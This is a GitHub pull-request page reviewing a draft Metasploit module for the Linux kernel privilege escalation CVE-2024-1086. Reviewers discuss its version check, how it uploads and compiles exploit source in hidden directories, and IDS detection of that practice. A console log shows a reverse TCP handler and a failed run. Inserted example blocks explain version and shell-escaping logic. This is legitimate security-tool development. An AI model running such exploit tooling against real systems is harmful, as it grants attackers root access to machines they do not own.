
WIP: LPE CVE-2024-1086 #19625

Draft: wants to merge 1 commit into master
Conversation

@h00die (Contributor) commented Nov 8, 2024

Fixes: #19153

WIP exploit for CVE-2024-1086. Running the exploit by hand on the box seems fairly reliable. However, running it through Metasploit currently results in a hard lock of the box about 75% of the time, either instantly or within 6 min. 25% of the time it's perfect though!

I've only been testing the live build functionality, not the 'drop a pre-compiled binary' branch.

I forgot to bring along a bunch of the library files as well, so need to add those back.

Comment on lines +81 to +91

    release = kernel_release
    if (
        Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
        Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
      ) ||
      (
        Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
        Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
      )
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end
Contributor:

Suggested change (replacing the lines quoted above; `release` is wrapped in Rex::Version so that `between?`, the Comparable predicate, compares versions rather than strings):

    release = Rex::Version.new(kernel_release.split('-').first)
    if release.between?(Rex::Version.new('5.15.0'), Rex::Version.new('6.0'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    elsif release.between?(Rex::Version.new('6.0'), Rex::Version.new('6.6'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end

but it seems that this can be simplified even further to:

    release = Rex::Version.new(kernel_release.split('-').first)
    if release.between?(Rex::Version.new('5.15.0'), Rex::Version.new('6.6'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end
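The two forms of the range check discussed above differ at the upper bound: the original nested comparison is half-open (>= 5.15.0 and < 6.6), while `between?` is inclusive at both ends, so a 6.6 kernel would be reported as vulnerable by the simplified version. The following is an added example, not code from the PR or from Metasploit; it uses Ruby's stdlib Gem::Version as a stand-in for Rex::Version (an assumption: Rex::Version compares dotted versions the same way) so that it runs offline.

```ruby
# Added example (not from the PR): kernel-version range check with both
# bound semantics side by side. Gem::Version stands in for Rex::Version
# (assumption: same comparison rules for dotted versions).
require 'rubygems'

VULN_MIN = Gem::Version.new('5.15.0')
VULN_MAX = Gem::Version.new('6.6')   # first non-affected major.minor, exclusive

# Strip the distro suffix ("5.15.0-126-generic" -> "5.15.0") before comparing,
# exactly as the module does with split('-').first. Note that this also
# strips an "-rcN" suffix, so "6.6.0-rc1" is compared as "6.6.0".
def base_version(kernel_release)
  Gem::Version.new(kernel_release.split('-').first)
end

# Half-open range [5.15.0, 6.6): equivalent to the original nested comparison.
def vulnerable_range?(kernel_release)
  v = base_version(kernel_release)
  v >= VULN_MIN && v < VULN_MAX
end

# The suggested between? form is inclusive on both ends, so 6.6 itself
# is reported as vulnerable; this function exists to make that visible.
def vulnerable_between?(kernel_release)
  base_version(kernel_release).between?(VULN_MIN, VULN_MAX)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample release strings in uname -r format.
  %w[5.15.0-126-generic 6.5.9 6.6.0 6.6.0-rc1 4.19.0].each do |rel|
    puts format('%-20s half-open=%-5s between?=%s',
                rel, vulnerable_range?(rel), vulnerable_between?(rel))
  end
end
```

Running it prints one line per sample release; the only row where the two columns disagree is 6.6.0 (and the rc build, which loses its suffix to the split), which is exactly the boundary a check method should be explicit about.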

    end

    def check_musl_tools?
      lib = cmd_exec('dpkg --get-selections | grep musl-tools')
Contributor:

This will only work on Debian :/

      zip.add_file(file.split('CVE-2024-1086/')[1], file_contents)
    end
    print_status('Finished creating exploit source zip, uploading...')
    zip_path = "#{nested_base}/.#{rand_text_alphanumeric(5..10)}.zip"
Contributor:

Can't the files be concatenated instead?

      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    nested_base = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
Contributor:

A couple of IDSs are flagging binary execution happening inside hidden folders. I think it'd be better to let the user specify the full path of the folder.

Comment on lines +147 to +153

    if command_exists?('python3')
      cmd_exec "python3 -m zipfile -e #{zip_path} #{nested_base}"
    else
      cmd_exec "unzip #{zip_path} -d #{nested_base}"
    end
    print_status('Compiling')
    cmd_exec "cd #{nested_base}; make"
Contributor:

The nested_base value contains a portion that is user specified from the WritableDir datastore option. If that value contains a space, then these commands will fail.

We've recently added a new command execution API to handle these cases correctly, and it should generally be used when the command is not static.

As an example the first one should be create_process('python3', args: ['-m', 'zipfile', '-e', zip_path, nested_base]).

The new #create_process method will take the arguments and ensure that they are escaped correctly for you given the context in which they're executed (platform, session type, etc.).
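To show concretely what the reviewer's escaping point means, here is an added example that is not code from the PR or from Metasploit: it builds the same unzip command two ways, once by string interpolation as in the reviewed lines and once from an argument array, then re-tokenises each the way /bin/sh would. Ruby's stdlib Shellwords is used here as a stand-in for the escaping that create_process performs (an assumption made for offline illustration; the real API's internals are not shown).

```ruby
# Added example (not from the PR or Metasploit): why a WritableDir containing
# a space breaks interpolated commands, and how argv-style escaping keeps
# each argument as one shell word. Shellwords stands in for create_process's
# escaping (assumption for illustration).
require 'shellwords'

# Naive form, as in the reviewed lines: the paths are spliced into a shell string.
def naive_unzip_command(zip_path, dest_dir)
  "python3 -m zipfile -e #{zip_path} #{dest_dir}"
end

# Argument-array form: every element is quoted so it survives as one word.
def escaped_unzip_command(zip_path, dest_dir)
  Shellwords.join(['python3', '-m', 'zipfile', '-e', zip_path, dest_dir])
end

# Same comparison for the "cd <dir>; make" step from the reviewed lines.
def naive_make_command(dest_dir)
  "cd #{dest_dir}; make"
end

def escaped_make_command(dest_dir)
  "cd #{Shellwords.escape(dest_dir)}; make"
end

# Re-tokenise the string the way a POSIX shell would and return the argv
# the program actually receives.
def argv_seen_by_shell(command)
  Shellwords.split(command)
end

if __FILE__ == $PROGRAM_NAME
  dest = '/tmp/my dir/.q8Kz2'          # constructed WritableDir with a space
  zip  = "#{dest}/.src.zip"
  p argv_seen_by_shell(naive_unzip_command(zip, dest))    # 8 words: paths split
  p argv_seen_by_shell(escaped_unzip_command(zip, dest))  # 6 words: paths intact
  p argv_seen_by_shell(naive_make_command(dest))
  p argv_seen_by_shell(escaped_make_command(dest))
end
```

With the constructed directory, the naive unzip string tokenises into eight words (each path is cut at its space), so python3 receives the wrong arguments; the joined form tokenises back into exactly the six-element array it was built from. The same difference applies to the `cd` step, where the naive form would change into the wrong directory before running make.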

    'Notes' => {
      'Stability' => [CRASH_OS_DOWN],
      'Reliability' => [UNRELIABLE_SESSION],
      'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
Contributor:

Is SCREEN_EFFECTS due to the system locking up here? If not, would you mind dropping a comment to clarify?

@msutovsky-r7 (Contributor) commented:

Not really sure if it applies here as this PR is marked as draft, but I have been doing review for #19745 and noticed the following:

    msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > set session 1
    session => 1
    msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > run
    [*] Started reverse TCP handler on 192.168.95.128:4444 
    [!] SESSION may not be compatible with this module:
    [!]  * Unknown session arch
    [*] Running automatic check ("set AutoCheck false" to disable)
    [+] The target appears to be vulnerable. Kernel version 5.15.0-126-generic appears to be vulnerable
    [*] Creating /tmp/.AwYfaDUz
    [-] Exploit failed: ArgumentError wrong number of arguments (given 1, expected 2)
    [*] Exploit completed, but no session was created.

Not really sure if it's caused by the escape fix, but it might be worth having it noted here. I'll investigate more later on.

@msutovsky-r7 msutovsky-r7 self-assigned this Dec 20, 2024
Successfully merging this pull request may close these issues: Linux LPE (CVE-2024-1086)
4 participants